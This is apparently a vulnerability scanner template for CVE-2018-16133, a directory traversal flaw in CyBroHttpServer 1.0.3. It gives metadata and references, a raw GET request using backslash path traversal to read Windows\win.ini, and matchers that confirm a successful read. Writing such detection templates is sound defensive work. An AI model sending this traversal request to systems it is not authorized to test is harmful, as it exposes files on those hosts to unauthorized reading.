id: CVE-2018-16133 info: name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal author: 0x_Akoko severity: medium description: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI. reference: - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - http://www.cybrotech.com/ - https://www.cvedetails.com/cve/CVE-2018-16133 - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 tags: cve,cve2018,cybrotech,lfi requests: - raw: - |+ GET \..\..\..\..\Windows\win.ini HTTP/1.1 Host: {{Hostname}} unsafe: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and